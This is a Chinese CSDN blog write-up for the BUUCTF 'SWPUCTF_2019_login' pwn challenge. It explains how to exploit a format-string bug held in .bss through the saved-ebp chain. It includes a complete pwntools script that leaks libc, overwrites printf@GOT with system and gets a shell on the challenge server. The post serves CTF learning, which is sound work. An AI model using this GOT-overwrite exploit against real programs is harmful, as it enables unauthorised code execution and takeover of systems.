BUUCTF之“SWPUCTF_2019_login”

最新推荐文章于 2023-07-15 20:24:04 发布
最新推荐文章于 2023-07-15 20:24:04 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 二进制pwn学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/122271499
版权

与以往不同,输入的格式化字符串被输入在".bss"段中,也无法直接任意内存写。
这里 格式化字符串在bss段上的情况:间接修改printf.got表为system,,,
ebp对应的地址映射比较关键

至于题目程序分析就不具体分析了,看其余师傅的即可。
这里还不错,程序本身无限循环,让printf格式化漏洞利用比较方便。
我们考虑利用修改printf的got表为system,输入参数,得到shell。

WP:

from pwn import*
p=remote('node4.buuoj.cn',27208)
#context.log_level='debug'

elf=ELF('./log')
libc=ELF('./32libc-2.27.so')

def fmtsend(addr,plase):
    p.recvuntil('Try again!\n')
    payload='%'+str(addr)+'c'+'%'+str(plase)+'$hn'
    p.sendline(payload)


p.sendlineafter('name:','aaa')
payload1='%15$p'
p.sendlineafter('password:',payload1)
p.recvuntil('This is the wrong password: ')
libc_start_main = int(p.recvuntil('\n')[:-1],16)-241


libc_base =libc_start_main-libc.symbols['__libc_start_main']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search('/bin/sh\x00').next()


payload2='%6$p'
p.sendlineafter('Try again!\n',payload2)
p.recvuntil('This is the wrong password: ')
target=int(p.recvuntil('\n')[:-1],16)


top_stack_now=target-0x28
stack_addr=top_stack_now+0x2c
stack_addr2=top_stack_now+0x24
bian1=stack_addr&0xffff
bian2=elf.got['printf']&0xffff
bian3=stack_addr2&0xffff
system_low=system &0xffff
system_hign=(system>>16)&0xffff


fmtsend(bian1,6)
fmtsend(bian2,10)
fmtsend(bian1-8,6)
fmtsend(bian2+2,10)


payload0='%'+str(system_low)+'c'+'%'+str(11)+'$hn'+'%'+str(system_hign-system_low)+'c'+'%'+str(9)+'$hn'
p.recvuntil('Try again!\n')
p.sendline(payload0)
#p.sendline(';/bin/sh\x00')
p.sendline(';sh')

p.interactive()

根据以上WP盘点下收获:

  1. 首先是格式化字符串漏洞的泄露问题:
    可以在printf函数调用处下断点,进而查看stack,看看里边有什么内容,本题发现有“__libc_start_main”这个东西而且后面直接给了距离“__libc_start_main”的偏移量,那么泄露出来就很好计算libc基地址,进而求system与binsh。
  2. 另外本题与之前的“格式化字符串”在栈中的题目不同,被输入到了bss段上,但是我们还是得修改printf的got为system的,那么如何做到?
    我们来回忆一下:
    最初格式化字符串被送到栈上的时候:栈上某个栈的地址存的就是elf.got[“printf”] (而且一般是“0x8048,,,,”)多少的。进而利用%n修改。
    那么如果我们将栈上类似存的数据(0x8048,,,,)的改成printf.got不就一样了吗,,,,,,

稍稍解释一下WP:
在这里插入图片描述

结合这张图

fmtsend(bian1,6)
fmtsend(bian2,10)

这是在间接修改栈上d06c处的0x8048689为printf.got的值(0x848,,,,)
因为修改函数“ fmtsend”是2个字节2个字节修改的,所以为了提高修稿成功性,将总共4个字节的真正printf函数地址全部修改位system地址

fmtsend(bian1-8,6)
fmtsend(bian2+2,10)

这个间接修改d064处的0x804b080位printf.got值的(print.got+2)对应的效果就是修改了printf.got表高2字节。

Hvf0x
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PwnSWPUCTF_2019_login
Nothing
12-09 1148
例行查看程序保护。 分析程序,最里面函数存在格式化字符串漏洞。但是格式化字符串不再栈上,而在bss上,没办法直接任意地址读写,于是动态调试观察栈上数据。 观察到fff65158指向fff65168,fff65168指向fff65178。那么就可以修改fff65168的内容,然后再观察栈上还有什么有用数据,注意到fff65160和fff65164的值离got表很近,于是想到可以修改这两个地方的后...
[CTF]PWN--非栈上格式化字符串漏洞
最新发布
2301_79880752的博客
02-26 1915
一般来说,栈上的格式化字符串漏洞利用步骤是先泄露地址,包括ELF程序地址和libc地址;然后将需要改写的GOT表地址直接传到栈上,同时利用%c%n的方法改写入地址,最后就是劫持流程。但是对于BSS或是堆上格式化字符串,也就是非栈上格式化字符串漏洞,无法直接将想要改写的地址指针放置在栈上,也就没办法实现任意地址写。本文主要为大家介绍BSS上的格式化字符串漏洞的解法。
SWPUCTF_2019_login
z1r0的博客
03-09 552
SWPUCTF_2019_login 查看保护 格式化字符串漏洞,但是s1和正常的栈上格式化不一样,这里是非栈上。 攻击思路:因为是非栈上,所以需要借助ebp这里的链子来实现将printf_got改为system_addr。 1.首先借助这个格式化漏洞拿到libc和ebp的地址。 2.接下来就是借助ebp这条链子将printf_got改到这个链子上,最后的结构为下图 用%6$hhn来修改%10$处的数据然后%10$hhn来修改%14$处的数据最后使得使得%14$处为printf的GOT表地址,同样的
bss格式化字符串处理【buuoj】SWPUCTF_2019_login
weixin_46521144的博客
08-10 997
这道题用了两种方法去做,一种是修改got表,零一种是修改返回值控制执行流。 IDA分析 很明显的格式化字符串漏洞,但是是在bss上 总结一下32位格式化字符串bss上的处理方法就是:寻找一个类似ebp的栈上寄存器,如下图 通过修改这个ebp,可以修改上图0xffc78f38的值为想要的(记住:格式化字符串修改栈上指针指向区域的地址,因此是0xffc78f38)如果想要劫持got表,寻找下面80开头的数据(和got表比较相关)修改完后就可以变成下图这样 (思考一下为什么要这么写:因为一般的格式化字符
格式化字符串bss上的处理
playmaker的博客
06-19 2520
格式化字符串bss上的内容处理 先查看程序保护,保护全开 拿到程序一眼就看到了格式化字符串的漏洞 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [esp+0h] [ebp-10h] unsigned int v6; // [esp+4h]...
BUU-SWPUCTF_2019_login
m0_46204503的博客
12-22 2186
非栈上格式化字符串漏洞 具体原理:由于不在栈上,所以我们可控数据没法写到栈上,也就没有办法变成printf的某个参数 例(buu-SWPUCTF_2019_login) 检查保护,没pie,got可被修改 IDA查看程序,存在格式化字符串漏洞 思路:由于不存在栈溢出,且没有给libc,那么我们的思路就有限了,修改printf的got 问题分析: 首先这是一道32位的非栈上格式化字符串漏洞,那么与普通格式化字符串漏洞相比较有什么区别呢? 首先栈信息泄露是相同的,但是找偏移的话较为不
Login-system.rar_login_ registration
09-24
基本的登陆系统界面设计,没有注册,仅供学习和测试用,包括登陆,获取密码,修改密码,使用OLEDB连接建立与sql数据库进行数据交互.
java-Login.zip_login java
09-22
实现java 登录界面的基本代码,在eclipse中新建一个java project,命名为Login.java,然后将代码复制进去运行即可。
GMS.rar_GMS Login_steelxzn
09-23
一个商品管理小程序。 编译源程序: 1. 去掉“只读”属性。 2. 需要将该数据库文件放在工程目录下。 登录: 用户名:admin 密码:admin
java-login.rar_java applet login_login
09-24
java源程序,显示一简单的“登录界面”
servlet_login_project.rar_开发login servlet
09-20
标准的servlet登录适合学习用,有图片验证和MD5加密。
暑假集训——Hitcon_Trainning——lab9_playfmt——格式化字符串漏洞_字符串bss
qq_41667316的博客
07-13 707
格式化字符串漏洞 思路 一开始就是没有思路,太菜了,真的太菜了TAT。 这里的buf是在bss,也就是意味着没有办法用常规方法做。 看了大佬的wp才知道可以控制ebp来实现地址任意写。 但是我觉得或许用栈迁移也可以试一下。 先写一波控制ebp! 控制ebp 首先,格式化字符串漏洞的两个利用方式 泄露栈上内容 改写某地址内容(前提是这个地址要在栈上,也就是printf可控的地方) 原理...
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7172
BUUCTF题目Misc部分wp(持续更新)
BUUCTF:[ACTF新生赛2020]swp
末初的CSDN博客
07-23 3957
BUUCTF:[ACTF新生赛2020]swp
SWPUCTF2019web题复现
bmth666的博客
04-05 1179
[SWPU2019]easy_web 有一个登录框,试了试万能密码失败,那就注册吧 登录后发现有一个申请广告,在标题处输入11111111’,发现报错,应该是sql注入 禁用了or,空格等等,先使用union发现有22列 -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22 后面发现还可以用-1'/**/group/**/by/**/22,'1,一样可以爆出为22列 查看数据库:-1'
BUUCTF WEB ESAYLOGIN
qq_41696858的博客
03-15 5463
登录注册首想二次注入,但是注册成功以后发现连个回显点都没有,所以这条路就断了 然后随便注册一个账号,有个getflag按钮,点击发现权限不够。这里就想到要伪造身份绕过了 审计注册页面源码,发现/static/js/app.js目录 看看,发现hint /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ 百度一下,看看koa是个啥,原来是个nodejs的web框架 function login() { const username
BUUCTF-EasyLogin
shawdow_bug的博客
07-15 867
这是一道 Node.js 语言的题目,在此记录我在做这道题的思考过程。
不满6位补零 字符串_非栈上格式化字符串漏洞利用技巧
weixin_39617669的博客
12-25 254
0x00前言关于Linux栈上格式化字符串漏洞的利用网上已经有许多讲解了,但是非栈上的格式化字符串漏洞很少有人介绍。这里主要以上周末SUCTF比赛中playfmt题目为例,详细介绍一下bss上或堆上的格式化字符串利用技巧。0x01基础知识点格式化字符串漏洞的具体原理就不再详细叙述,这里主要简单介绍一下格式化参数位置的计算和漏洞利用时常用的格式字符。参数位置计算linux下32位程序是栈传参,从左...
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
xlcvv的博客
04-28 1561
进入题目: swp文件,我第一次做CTF的时候就是swp泄露:[2019EIS高校运维赛]ezupload swp文件: 非正常关闭vi/vim编辑器时会生成一个.swp文件 关于swp文件 使用vi/vim,经常可以看到swp这个文件,那这个文件是怎么产生的呢,当你打开一个文件,vi就会生成这么一个.(filename)swp文件 以备不测(不测下面讨论),如果你正常退出,那么这个这个sw...
buuctf login
08-26
BUUCTF(北京邮电大学CTF战队)是一个网络安全竞赛平台,用于学习和实践网络安全技术。首先,您需要访问BUUCTF的官方网站并注册一个账号。注册完成后,您可以使用您的账号登录到BUUCTF平台,参与各类CTF比赛和挑战。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值